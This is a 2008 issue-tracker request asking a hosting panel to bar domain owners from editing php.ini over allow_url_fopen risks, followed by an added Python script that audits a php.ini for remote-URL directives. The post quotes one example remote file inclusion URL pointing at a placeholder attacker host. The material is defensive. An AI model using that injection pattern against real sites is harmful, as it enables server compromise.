Submitted by sgrayban on Mon, 04/14/2008 - 02:09
I would like to disable the domain owners from editing their own php.ini file simply because of security issues.
Most people have no idea how to properly set their ini file up and I see no reason to let them when they could possibly open the server up to attacks. And seeing that you are already setting the cgi/fcgi wrappers to chattr +i it would be more difficult for them to bypass the ini file to use.
The biggest concern I have is allowing allow_url_fopen = On which opens a whole new set of hacks in. Notably the infamous http://example.com/index.php?page=http://crackerscum.net/evilscript.txt injection.
Status:
Closed (fixed)
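
An added example, not part of the original post or the project's code: a small audit of a per-domain php.ini for the setting raised above, assuming that file is the only php.ini PHP loads for the domain. It also reports allow_url_include, which PHP 5.2 and later require before a remote URL can be included; the function names and the sample file are constructed for illustration.

```python
import re

# Directives that let PHP open or include remote URLs.
RISKY = ("allow_url_fopen", "allow_url_include")
# Values PHP's ini parser treats as boolean true.
TRUTHY = {"1", "on", "yes", "true"}
# PHP's built-in defaults, applied when the file never sets the directive
# (assumption: no other ini file is loaded for this domain).
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0"}

LINE = re.compile(r"^\s*([A-Za-z0-9_.]+)\s*=\s*(.*?)\s*$")

def effective_settings(ini_text):
    """Return {directive: (value, line_no)} for the last assignment of each risky directive."""
    found = {}
    for no, raw in enumerate(ini_text.splitlines(), 1):
        line = raw.split(";", 1)[0]            # drop ; comments
        m = LINE.match(line)
        if not m:
            continue                           # section header, blank or comment line
        key, val = m.group(1).lower(), m.group(2).strip("\"'")
        if key in RISKY:
            found[key] = (val, no)             # a later line overrides an earlier one
    return found

def audit(ini_text):
    """Return [(directive, value, line_no)] for enabled directives; line_no is None for a default."""
    found = effective_settings(ini_text)
    findings = []
    for key in RISKY:
        val, no = found.get(key, (DEFAULTS[key], None))
        if val.lower() in TRUTHY:
            findings.append((key, val, no))
    return findings

# Constructed sample of a domain owner's php.ini (not from the original post).
SAMPLE = """\
[PHP]
; allow_url_fopen = Off
allow_url_fopen = On
allow_url_include = "1"   ; enabled by the site owner
memory_limit = 64M
"""

if __name__ == "__main__":
    for directive, value, line_no in audit(SAMPLE):
        print(f"line {line_no}: {directive} = {value}")
```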